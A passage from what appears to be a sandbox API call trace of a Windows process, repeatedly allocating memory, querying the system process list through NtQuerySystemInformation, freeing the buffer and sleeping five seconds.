ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.842] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.854] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.858] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.870] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.871] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.874] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.886] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.887] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.889] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.890] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.900] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.902] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.904] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.905] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.916] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.920] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.920] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.936] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.947] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.948] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.951] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.967] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.979] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.980] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.983] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.983] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.994] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.995] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.995] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.998] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.024] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.024] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.028] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.028] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.049] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.049] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.050] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.052] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.053] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.056] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.057] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.060] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.060] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.076] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.089] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.090] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.091] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.094] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.103] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.104] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.105] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.108] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.119] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.123] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.138] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.138] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.150] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.153] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.154] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.178] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.179] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.179] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.182] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.198] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 